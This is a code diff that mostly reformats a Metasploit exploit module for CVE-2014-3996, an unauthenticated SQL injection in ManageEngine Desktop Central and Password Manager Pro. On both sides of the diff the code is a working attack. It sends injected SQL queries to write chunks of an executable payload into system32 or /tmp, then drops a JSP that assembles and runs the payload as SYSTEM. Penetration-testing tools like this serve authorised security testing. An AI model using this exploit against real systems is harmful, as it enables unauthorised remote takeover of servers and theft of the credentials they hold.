@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -11,88 +10,94 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Exploit::EXE
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection",
-      'Description'    => %q{
-        This module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet,
-        which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and
-        Password Manager Pro v6 build 6500 to v7 build 7002 (including the MSP versions). The
-        SQL injection can be used to achieve remote code execution as SYSTEM in Windows or as
-        the user in Linux. This module exploits both PostgreSQL (newer builds) and MySQL (older
-        or upgraded builds). MySQL targets are more reliable due to the use of relative paths;
-        with PostgreSQL you should find the web root path via other means and specify it with
-        WEB_ROOT.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection",
+        'Description' => %q{
+          This module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet,
+          which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and
+          Password Manager Pro v6 build 6500 to v7 build 7002 (including the MSP versions). The
+          SQL injection can be used to achieve remote code execution as SYSTEM in Windows or as
+          the user in Linux. This module exploits both PostgreSQL (newer builds) and MySQL (older
+          or upgraded builds). MySQL targets are more reliable due to the use of relative paths;
+          with PostgreSQL you should find the web root path via other means and specify it with
+          WEB_ROOT.
 
-        The injection is only exploitable via a GET request, which means that the payload
-        has to be sent in chunks smaller than 8000 characters (URL size limitation). Small
-        payloads and the use of exe-small is recommended, as you can only do between 10 and
-        20 injections before using up all the available ManagedConnections until the next
-        server restart.
+          The injection is only exploitable via a GET request, which means that the payload
+          has to be sent in chunks smaller than 8000 characters (URL size limitation). Small
+          payloads and the use of exe-small is recommended, as you can only do between 10 and
+          20 injections before using up all the available ManagedConnections until the next
+          server restart.
 
-        This vulnerability exists in all versions released since 2006, however builds below
-        DC v7 70200 and PMP v6 6500 do not ship with a JSP compiler. You can still try your
-        luck using the MySQL targets as a JDK might be installed in the $PATH.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Pedro Ribeiro <pedrib[at]gmail.com>'  # Vulnerability discovery and MSF module
+          This vulnerability exists in all versions released since 2006, however builds below
+          DC v7 70200 and PMP v6 6500 do not ship with a JSP compiler. You can still try your
+          luck using the MySQL targets as a JDK might be installed in the $PATH.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2014-3996' ],
           [ 'OSVDB', '110198' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2014/Aug/55' ]
         ],
-      'Arch'           => ARCH_X86,
-      'Platform'       => %w{ linux win },
-      'Targets'        =>
-        [
-          [  'Automatic', {}  ],
-          [  'Desktop Central v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows',
+        'Arch' => ARCH_X86,
+        'Platform' => %w{linux win},
+        'Targets' => [
+          [ 'Automatic', {} ],
+          [
+            'Desktop Central v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows',
             {
               'WebRoot' => 'C:\\ManageEngine\\DesktopCentral_Server\\webapps\\DesktopCentral\\',
               'Database' => 'postgresql',
               'Platform' => 'win'
             }
           ],
-          [  'Desktop Central MSP v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows',
+          [
+            'Desktop Central MSP v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows',
             {
               'WebRoot' => 'C:\\ManageEngine\\DesktopCentralMSP_Server\\webapps\\DesktopCentral\\',
               'Database' => 'postgresql',
               'Platform' => 'win'
             }
           ],
-          [  'Desktop Central [MSP] v7 >= b70200 / v8 / v9 < b90039 (MySQL) on Windows',
+          [
+            'Desktop Central [MSP] v7 >= b70200 / v8 / v9 < b90039 (MySQL) on Windows',
             {
               'WebRoot' => '../../webapps/DesktopCentral/',
               'Database' => 'mysql',
               'Platform' => 'win'
             }
           ],
-          [  'Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Windows',
+          [
+            'Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Windows',
             {
               'WebRoot' => 'C:\\ManageEngine\\PMP\\webapps\\PassTrix\\',
               'Database' => 'postgresql',
               'Platform' => 'win'
             }
           ],
-          [  'Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Windows',
+          [
+            'Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Windows',
             {
               'WebRoot' => '../../webapps/PassTrix/',
               'Database' => 'mysql',
               'Platform' => 'win'
             }
           ],
-          [  'Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Linux',
+          [
+            'Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Linux',
             {
               'WebRoot' => '/opt/ManageEngine/PMP/webapps/PassTrix/',
               'Database' => 'postgresql',
               'Platform' => 'linux'
             }
           ],
-          [  'Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Linux',
+          [
+            'Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Linux',
             {
               'WebRoot' => '../../webapps/PassTrix/',
               'Database' => 'mysql',
@@ -100,28 +105,36 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'DefaultTarget'  => 0,
-      'Privileged'     => false,            # Privileged on Windows but not on Linux targets
-      'DisclosureDate' => '2014-06-08'))
+        'DefaultTarget' => 0,
+        'Privileged' => false, # Privileged on Windows but not on Linux targets
+        'DisclosureDate' => '2014-06-08',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         OptPort.new('RPORT',
-          [true, 'The target port', 8020]),
+                    [true, 'The target port', 8020]),
         OptString.new('WEB_ROOT',
-          [false, 'Slash terminated web server root filepath (escape Windows paths with 4 slashes \\\\\\\\)'])
-      ])
+                      [false, 'Slash terminated web server root filepath (escape Windows paths with 4 slashes \\\\\\\\)'])
+      ]
+    )
 
     register_advanced_options(
       [
         OptInt.new('CHUNK_SIZE',
-          [true, 'Number of characters to send per request (< 7800)', 7500]),
+                   [true, 'Number of characters to send per request (< 7800)', 7500]),
         OptInt.new('SLEEP',
-          [true, 'Seconds to sleep between injections (x1 for MySQL, x2.5 for PostgreSQL)', 2]),
+                   [true, 'Seconds to sleep between injections (x1 for MySQL, x2.5 for PostgreSQL)', 2]),
         OptBool.new('EXE_SMALL',
-          [true, 'Use exe-small encoding for better reliability', true]),
-      ])
-
+                    [true, 'Use exe-small encoding for better reliability', true]),
+      ]
+    )
   end
 
   def check
@@ -154,13 +167,13 @@ class MetasploitModule < Msf::Exploit::Remote
       web_root = @my_target['WebRoot']
     end
 
-    jsp_name  = rand_text_alpha_lower(8) + ".jsp"
+    jsp_name = rand_text_alpha_lower(8) + ".jsp"
     fullpath = web_root + jsp_name
     inject_exec(fullpath)
-    register_file_for_cleanup(fullpath.sub('../',''))
+    register_file_for_cleanup(fullpath.sub('../', ''))
 
     print_status("Requesting #{jsp_name}")
-    send_request_raw({'uri' => normalize_uri(jsp_name)})
+    send_request_raw({ 'uri' => normalize_uri(jsp_name) })
   end
 
   # Test for Password Manager Pro
@@ -168,9 +181,9 @@ class MetasploitModule < Msf::Exploit::Remote
     db_paths = {}
 
     res = send_request_cgi({
-                               'uri' => normalize_uri("PassTrixMain.cc"),
-                               'method' => 'GET'
-                           })
+      'uri' => normalize_uri("PassTrixMain.cc"),
+      'method' => 'GET'
+    })
 
     if res && res.code == 200 && res.body.to_s =~ /ManageEngine Password Manager Pro/
       if datastore['WEB_ROOT']
@@ -189,9 +202,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def desktop_central_db_paths
     db_paths = {}
     res = send_request_cgi({
-                               'uri' => normalize_uri("configurations.do"),
-                               'method' => 'GET'
-                           })
+      'uri' => normalize_uri("configurations.do"),
+      'method' => 'GET'
+    })
 
     if res && res.code == 200 && res.body.to_s =~ /ManageEngine Desktop Central/
       if datastore['WEB_ROOT']
@@ -226,12 +239,12 @@ class MetasploitModule < Msf::Exploit::Remote
     inject_sql("select @@version_compile_os into dumpfile '#{file_path}'", "mysql")
 
     res = send_request_cgi({
-                               'uri' => normalize_uri(rand_txt),
-                               'method' => 'GET'
-                           })
+      'uri' => normalize_uri(rand_txt),
+      'method' => 'GET'
+    })
 
     if res && res.code == 200
-      register_file_for_cleanup(file_path.sub('../',''))
+      register_file_for_cleanup(file_path.sub('../', ''))
       if res.body.to_s =~ /Win32/ or res.body.to_s =~ /Win64/
         if mysql_path =~ /DesktopCentral/
           # Desktop Central [MSP] / MySQL / Windows
@@ -256,9 +269,9 @@ class MetasploitModule < Msf::Exploit::Remote
     inject_sql("copy (select version()) to '#{file_path}'", "postgresql")
 
     res = send_request_cgi({
-                               'uri' => normalize_uri(rand_txt),
-                               'method' => 'GET'
-                           })
+      'uri' => normalize_uri(rand_txt),
+      'method' => 'GET'
+    })
 
     if res && res.code == 200
       register_file_for_cleanup(file_path)
@@ -286,9 +299,9 @@ class MetasploitModule < Msf::Exploit::Remote
     inject_sql("copy (select version()) to '#{file_path}'", "postgresql")
 
     res = send_request_cgi({
-                               'uri' => normalize_uri(rand_txt),
-                               'method' => 'GET'
-                           })
+      'uri' => normalize_uri(rand_txt),
+      'method' => 'GET'
+    })
 
     if res && res.code == 200 && res.body.to_s =~ /linux/
       # Password Manager Pro / PostgreSQL / Linux
@@ -331,23 +344,23 @@ class MetasploitModule < Msf::Exploit::Remote
   # Creates the JSP that will assemble the payload on the server
   #
   def generate_jsp_encoded(files)
-    native_payload_name = rand_text_alpha(rand(6)+3)
+    native_payload_name = rand_text_alpha(rand(6) + 3)
     ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
 
-    var_raw     = rand_text_alpha(rand(8) + 3)
+    var_raw = rand_text_alpha(rand(8) + 3)
     var_ostream = rand_text_alpha(rand(8) + 3)
-    var_buf     = rand_text_alpha(rand(8) + 3)
+    var_buf = rand_text_alpha(rand(8) + 3)
     var_decoder = rand_text_alpha(rand(8) + 3)
-    var_tmp     = rand_text_alpha(rand(8) + 3)
-    var_path    = rand_text_alpha(rand(8) + 3)
-    var_proc2   = rand_text_alpha(rand(8) + 3)
-    var_files   = rand_text_alpha(rand(8) + 3)
-    var_ch      = rand_text_alpha(rand(8) + 3)
+    var_tmp = rand_text_alpha(rand(8) + 3)
+    var_path = rand_text_alpha(rand(8) + 3)
+    var_proc2 = rand_text_alpha(rand(8) + 3)
+    var_files = rand_text_alpha(rand(8) + 3)
+    var_ch = rand_text_alpha(rand(8) + 3)
     var_istream = rand_text_alpha(rand(8) + 3)
-    var_file    = rand_text_alpha(rand(8) + 3)
+    var_file = rand_text_alpha(rand(8) + 3)
 
     files_decl = "{ "
-    files.each { |file|  files_decl << "\"#{file}\"," }
+    files.each { |file| files_decl << "\"#{file}\"," }
     files_decl[-1] = "}"
 
     if @my_target['Platform'] == 'linux'
@@ -413,7 +426,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
   def inject_sql(sqli_command, target = nil)
     target = (target == nil) ? @my_target['Database'] : target
     if target == 'postgresql'
@@ -426,10 +438,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri("LinkViewFetchServlet.dat"),
-      'vars_get'  => {
-        'sv'    => sqli_prefix << sqli_command << sqli_suffix
+      'method' => 'GET',
+      'uri' => normalize_uri("LinkViewFetchServlet.dat"),
+      'vars_get' => {
+        'sv' => sqli_prefix << sqli_command << sqli_suffix
       }
     })
 
@@ -440,15 +452,15 @@ class MetasploitModule < Msf::Exploit::Remote
       # Assuming mysql
       sleep(datastore['SLEEP'])
     end
-   end
+  end
 
   # Generate the actual payload
   def generate_exe_payload
-    opts = {:arch => @my_target.arch, :platform => @my_target.platform}
+    opts = { :arch => @my_target.arch, :platform => @my_target.platform }
     payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
     if datastore['EXE_SMALL'] and @my_target['Platform'] == 'win'
       exe = Msf::Util::EXE.to_executable_fmt(framework, arch, platform,
-        payload.encoded, "exe-small", opts)
+                                             payload.encoded, "exe-small", opts)
     else
       exe = generate_payload_exe(opts)
     end
@@ -469,7 +481,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     chunks = (base64_exe_len.to_f / chunk_size).ceil
     time = chunks * datastore['SLEEP'] *
-     ((@my_target['Database'] == 'postgresql') ? 2.5 : 1)
+           ((@my_target['Database'] == 'postgresql') ? 2.5 : 1)
 
     # We dump our files in either C:\Windows\system32 or /tmp
     # It's not very clean, but when using a MySQL target we have no other choice
@@ -479,20 +491,20 @@ class MetasploitModule < Msf::Exploit::Remote
     files = Array.new(chunks)
     files.map! do |file|
       if @my_target['Platform'] == 'win'
-        file = "C:\\\\windows\\\\system32\\\\" + rand_text_alpha(rand(8)+3)
+        file = "C:\\\\windows\\\\system32\\\\" + rand_text_alpha(rand(8) + 3)
       else
         # Assuming Linux, let's hope we can write to /tmp
-        file = "/tmp/" + rand_text_alpha(rand(8)+3)
+        file = "/tmp/" + rand_text_alpha(rand(8) + 3)
       end
     end
 
     print_status("Payload size is #{base64_exe_len}, injecting #{chunks} chunks in #{time} seconds")
 
     if @my_target['Database'] == 'postgresql'
-      inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'")
+      inject_sql("copy (select '#{base64_exe[copied, chunk_size]}') to '#{files[counter]}'")
     else
       # Assuming mysql
-      inject_sql("select '#{base64_exe[copied,chunk_size]}' from mysql.user into dumpfile '#{files[counter]}'")
+      inject_sql("select '#{base64_exe[copied, chunk_size]}' from mysql.user into dumpfile '#{files[counter]}'")
     end
     register_file_for_cleanup(files[counter])
     copied += chunk_size
@@ -504,10 +516,10 @@ class MetasploitModule < Msf::Exploit::Remote
         chunk_size = base64_exe_len - copied
       end
       if @my_target['Database'] == 'postgresql'
-        inject_sql("copy (select '#{base64_exe[copied,chunk_size]}') to '#{files[counter]}'")
+        inject_sql("copy (select '#{base64_exe[copied, chunk_size]}') to '#{files[counter]}'")
       else
         # Assuming mysql
-        inject_sql("select '#{base64_exe[copied,chunk_size]}' from mysql.user into dumpfile '#{files[counter]}'")
+        inject_sql("select '#{base64_exe[copied, chunk_size]}' from mysql.user into dumpfile '#{files[counter]}'")
       end
       register_file_for_cleanup(files[counter])
       copied += chunk_size
@@ -552,24 +564,24 @@ class MetasploitModule < Msf::Exploit::Remote
   # Test for Desktop Central
   def check_desktop_central
     res = send_request_cgi({
-                               'uri' => normalize_uri("configurations.do"),
-                               'method' => 'GET'
-                           })
+      'uri' => normalize_uri("configurations.do"),
+      'method' => 'GET'
+    })
 
     unless res && res.code == 200
       return Exploit::CheckCode::Unknown
     end
 
     if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
-        res.body.to_s =~ /ManageEngine Desktop Central MSP 7/
+       res.body.to_s =~ /ManageEngine Desktop Central MSP 7/
       # DC v7 uses the MySQL database
       print_status("Detected Desktop Central v7 (MySQL)")
       return Exploit::CheckCode::Appears
     elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
-        res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
+          res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
       return check_desktop_central_8(res.body.to_s)
     elsif res.body.to_s =~ /ManageEngine Desktop Central 9/ ||
-        res.body.to_s =~ /ManageEngine Desktop Central MSP 9/
+          res.body.to_s =~ /ManageEngine Desktop Central MSP 9/
       return check_desktop_central_9(res.body.to_s)
     end
 
@@ -579,23 +591,22 @@ class MetasploitModule < Msf::Exploit::Remote
   # Test for Password Manager Pro
   def check_password_manager_pro
     res = send_request_cgi({
-                               'uri' => normalize_uri("PassTrixMain.cc"),
-                               'method' => 'GET'
-                           })
+      'uri' => normalize_uri("PassTrixMain.cc"),
+      'method' => 'GET'
+    })
 
     if res && res.code == 200 &&
-        res.body.to_s =~ /ManageEngine Password Manager Pro/ &&
-        (
-          res.body.to_s =~ /login\.css\?([0-9]+)/ ||                            # PMP v6
-          res.body.to_s =~ /login\.css\?version=([0-9]+)/ ||                    # PMP v6
-          res.body.to_s =~ /\/themes\/passtrix\/V([0-9]+)\/styles\/login\.css"/ # PMP v7
-        )
+       res.body.to_s =~ /ManageEngine Password Manager Pro/ &&
+       (
+         res.body.to_s =~ /login\.css\?([0-9]+)/ ||                            # PMP v6
+         res.body.to_s =~ /login\.css\?version=([0-9]+)/ ||                    # PMP v6
+         res.body.to_s =~ /\/themes\/passtrix\/V([0-9]+)\/styles\/login\.css"/ # PMP v7
+       )
       build = $1
     else
       return Exploit::CheckCode::Unknown
     end
 
-
     if ver_lt_eq(build, '6500')
       # if it's a build below 6500, it will only work if we have a JSP compiler
       print_status("Detected Password Manager Pro v6 #{build} (needs a JSP compiler)")
